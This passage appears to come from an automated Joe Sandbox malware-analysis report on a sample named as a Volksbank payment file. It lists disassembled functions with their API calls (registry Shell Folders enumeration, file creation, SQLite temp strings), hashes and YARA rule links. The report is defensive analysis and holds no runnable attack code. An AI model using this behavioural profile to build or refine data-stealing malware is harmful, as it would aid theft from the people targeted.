                                                                                                                                                                                                                                          • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                                                          • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                                                          • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                                          Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                                            • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2350177629-0
                                                                                                                                                                                                                                          • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                                          Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                          • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                                          • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                                          Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409042
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                                                                            • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 265355444-0
                                                                                                                                                                                                                                          • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                                          Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4131475296-0
                                                                                                                                                                                                                                          • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                                          • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFilefreememset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2507021081-0
                                                                                                                                                                                                                                          • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4131324427-0
                                                                                                                                                                                                                                          • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PathTemp$free
                                                                                                                                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                                          • API String ID: 924794160-1420421710
                                                                                                                                                                                                                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                                          Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                                          • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                                          Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                                          • String ID: General
                                                                                                                                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                                                                                                                                          • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                                                          • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
